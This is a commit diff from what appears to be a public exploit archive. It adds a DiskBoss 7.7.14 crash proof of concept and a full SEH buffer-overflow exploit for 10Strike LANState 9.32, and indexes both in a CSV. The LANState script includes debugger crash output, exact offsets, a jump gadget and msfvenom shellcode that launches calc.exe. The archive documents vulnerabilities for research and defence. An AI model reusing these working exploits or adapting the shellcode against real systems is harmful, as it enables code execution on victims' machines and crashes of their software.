DB: 2020-04-02

2 changes to exploits/shellcodes DiskBoss 7.7.14 - Denial of Service (PoC) 10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)
2020-04-02 05:01:49 +00:00 · 2020-04-02 05:01:49 +00:00 · c4e0c06fd9
commit c4e0c06fd9
parent 19615ff704
3 changed files with 154 additions and 0 deletions
--- a/exploits/windows/dos/48276.py
+++ b/exploits/windows/dos/48276.py
@ -0,0 +1,28 @@
+# Exploit Title: DiskBoss 7.7.14 - Denial of Service (PoC) 
+# Date: 2020-04-01
+# Exploit Author: Paras Bhatia
+# Vendor Homepage: https://www.diskboss.com/ 
+# Software Link Download: https://github.com/x00x00x00x00/diskboss_7.7.14/raw/master/diskboss_setup_v7.7.14.exe
+# Vulnerable Software: DiskBoss
+# Version: 7.7.14
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)  
+
+#Steps to Produce the Crash:
+
+#   1.- Run python code: DiskbossCrash.py
+#   2.- Copy content to clipboard
+#   3.- Open "diskboss.exe" (diskbsg.exe)
+#   4.- Go to "Command" > Search Files
+#   5.- Click on second + icon (located at right side of "Search Disks, Directories and Network Shares")
+#   6.- Click on " Add Input Directory"
+#   7.- Paste ClipBoard into the "Directory" field
+#   8.- Click on OK
+#   9.- Crashed
+
+#Python "DiskbossCrash.py" Code:
+   
+buffer = "\x41" * 7000
+f = open ("DiskbossCrash.txt", "w")
+f.write(buffer)
+f.close()
--- a/exploits/windows/local/48277.py
+++ b/exploits/windows/local/48277.py
@ -0,0 +1,124 @@
+# Exploit Title: 10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)
+# Date: 2020-04-01
+# Exploit Author: Hodorsec
+# Version: v9.32 x86
+# Software Link: https://www.10-strike.com/lanstate/lanstate-setup.exe
+# Vendor Homepage:  https://www.freecommander.com
+# Tested on:        Win7 x86 SP1 - Build 7601
+
+# Description:      
+# - Exploits the "Force Check" option when listing the Host Checks in option "Check List". Entering an overly long string, results in a crash which overwrites SEH.
+
+# Reproduction:
+# - Use indicated OS or manipulate settings: your mileage may vary due to different offsets on other Windows versions / SP's.
+# - Run the script, a TXT file will be generated
+# - On the Windows machine, open the TXT file in Wordpad. Copy the contents to clipboard (ctrl+c)
+# - Open LANState, use any "Map", for example the "demo_map"
+# - Click on tab "Home", click option "Check List"
+# - Rightclick on any existing hostname and click "Edit"
+# - Paste the value from clipboard in the field "Host address (name)"
+# - Next, Next, Finish
+# - In the "List of checks" overview, select the modified host and press the spacebar (Force Check)
+# - Check results
+
+# WinDBG initial crash output using only A's:
+# (c5c.c2c): Access violation - code c0000005 (first chance)
+# First chance exceptions are reported before any exception handling.
+# This exception may be expected and handled.
+# eax=00002759 ebx=0012f838 ecx=000007f6 edx=0012f880 esi=0781bf78 edi=00130000
+# eip=00402e57 esp=0012f7d8 ebp=0012f99c iopl=0         nv up ei pl nz na po nc
+# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
+# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\10-Strike LANState\LANState.exe
+# LANState+0x2e57:
+# 00402e57 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
+# 0:000> g
+# (c5c.c2c): Access violation - code c0000005 (first chance)
+# First chance exceptions are reported before any exception handling.
+# This exception may be expected and handled.
+# eax=0012f98c ebx=0012f98c ecx=05250858 edx=41414141 esi=00000002 edi=0012f7f0
+# eip=004053e6 esp=0012f7f8 ebp=0012f99c iopl=0         nv up ei pl nz na pe nc
+# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210206
+# LANState+0x53e6:
+# 004053e6 8b4af8          mov     ecx,dword ptr [edx-8] ds:0023:41414139=????????
+# 0:000> g
+# (c5c.c2c): Access violation - code c0000005 (first chance)
+# First chance exceptions are reported before any exception handling.
+# This exception may be expected and handled.
+# eax=00000000 ebx=00000000 ecx=41414141 edx=77f0720d esi=00000000 edi=00000000
+# eip=41414141 esp=0012f298 ebp=0012f2b8 iopl=0         nv up ei pl zr na pe nc
+# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
+# 41414141 ??              ???
+
+#!/usr/bin/python
+
+import sys,struct
+
+# Filename
+filename = "10_strike_lanstate-poc.txt"
+
+# Maximum length
+maxlen = 10000
+
+# Shellcode, using alphanum chars due to bytes considered to be bad above \x7f
+# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c -v shellcode
+# Payload size: 447 bytes
+shellcode = (
+"\xdb\xdc\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
+"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
+"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
+"\x4c\x78\x68\x6d\x52\x65\x50\x37\x70\x77\x70\x43\x50\x4d\x59"
+"\x39\x75\x36\x51\x59\x50\x32\x44\x6e\x6b\x32\x70\x46\x50\x6e"
+"\x6b\x70\x52\x34\x4c\x6e\x6b\x61\x42\x45\x44\x4c\x4b\x54\x32"
+"\x47\x58\x36\x6f\x6e\x57\x53\x7a\x66\x46\x46\x51\x79\x6f\x4e"
+"\x4c\x37\x4c\x51\x71\x53\x4c\x44\x42\x44\x6c\x61\x30\x4a\x61"
+"\x68\x4f\x66\x6d\x73\x31\x49\x57\x59\x72\x58\x72\x30\x52\x56"
+"\x37\x4e\x6b\x52\x72\x34\x50\x6c\x4b\x33\x7a\x35\x6c\x6c\x4b"
+"\x42\x6c\x57\x61\x74\x38\x6d\x33\x33\x78\x77\x71\x4b\x61\x32"
+"\x71\x6e\x6b\x51\x49\x77\x50\x76\x61\x6a\x73\x6e\x6b\x61\x59"
+"\x67\x68\x79\x73\x57\x4a\x42\x69\x4e\x6b\x37\x44\x6c\x4b\x43"
+"\x31\x4e\x36\x45\x61\x6b\x4f\x6c\x6c\x6a\x61\x48\x4f\x34\x4d"
+"\x47\x71\x5a\x67\x37\x48\x39\x70\x62\x55\x4b\x46\x65\x53\x63"
+"\x4d\x39\x68\x67\x4b\x73\x4d\x46\x44\x53\x45\x79\x74\x76\x38"
+"\x4c\x4b\x63\x68\x66\x44\x43\x31\x48\x53\x72\x46\x4e\x6b\x76"
+"\x6c\x70\x4b\x4e\x6b\x61\x48\x57\x6c\x46\x61\x79\x43\x6c\x4b"
+"\x54\x44\x6e\x6b\x57\x71\x68\x50\x6e\x69\x30\x44\x76\x44\x45"
+"\x74\x53\x6b\x61\x4b\x65\x31\x62\x79\x31\x4a\x30\x51\x39\x6f"
+"\x59\x70\x63\x6f\x71\x4f\x50\x5a\x6c\x4b\x56\x72\x4a\x4b\x6c"
+"\x4d\x73\x6d\x30\x6a\x77\x71\x6e\x6d\x4d\x55\x4e\x52\x37\x70"
+"\x75\x50\x63\x30\x52\x70\x63\x58\x56\x51\x4e\x6b\x42\x4f\x4e"
+"\x67\x69\x6f\x49\x45\x4d\x6b\x58\x70\x4d\x65\x6d\x72\x50\x56"
+"\x75\x38\x6e\x46\x6f\x65\x6f\x4d\x6d\x4d\x39\x6f\x58\x55\x75"
+"\x6c\x63\x36\x73\x4c\x76\x6a\x6b\x30\x59\x6b\x4d\x30\x52\x55"
+"\x74\x45\x6f\x4b\x43\x77\x42\x33\x63\x42\x62\x4f\x51\x7a\x77"
+"\x70\x73\x63\x69\x6f\x58\x55\x72\x43\x30\x61\x72\x4c\x31\x73"
+"\x46\x4e\x45\x35\x63\x48\x63\x55\x47\x70\x41\x41"
+)
+
+# Offsets
+crash_ebp = 228
+crash_nseh = 236
+crash_seh = crash_nseh + 4
+
+# Variables
+nops = "\x90" * 16                                              # Nops
+
+# Prefix
+prefix = "A" * crash_nseh                                       # Filler
+nseh = "\x71\x06\x70\x04"                                       # JNO # JO # Jump over NSEH/SEH
+seh = struct.pack("<L", 0x0132730f)                             # call dword ptr ss:[ebp-04] # [LANState.exe]
+suffix = nops                                                   # Old-school NOP'ing
+suffix += shellcode                                             # Magic!
+suffix += "D" * (maxlen - len(prefix + nseh + seh + suffix))    # Filler
+
+# Concatenate string for payload
+payload = prefix + nseh + seh + suffix                          # Put it all together
+
+try:
+    file = open(filename,"wb")
+    file.write(payload)
+    file.close()
+    print "[+] File " + filename + " with size " + str(len(payload)) + " created successfully"
+except:
+    print "[!] Error creating file!"
+    sys.exit(0)
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6691,6 +6691,7 @@ id,file,description,date,author,type,platform,port
 48237,exploits/windows/dos/48237.txt,"Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC)",2020-03-23,"Cem Onat Karagun",dos,windows,
 48259,exploits/windows/dos/48259.py,"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)",2020-03-27,"Ivan Marmolejo",dos,windows,
 48269,exploits/windows/dos/48269.py,"FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)",2020-03-31,"Paras Bhatia",dos,windows,
+48276,exploits/windows/dos/48276.py,"DiskBoss 7.7.14 - Denial of Service (PoC)",2020-04-01,"Paras Bhatia",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -11007,6 +11008,7 @@ id,file,description,date,author,type,platform,port
 48257,exploits/windows/local/48257.py,"Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)",2020-03-27,"Felipe Winsnes",local,windows,
 48264,exploits/windows/local/48264.py,"10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP)",2020-03-30,Hodorsec,local,windows,
 48267,exploits/windows/local/48267.txt,"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation",2020-03-30,"Daniel García Gutiérrez",local,windows,
+48277,exploits/windows/local/48277.py,"10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)",2020-04-01,Hodorsec,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139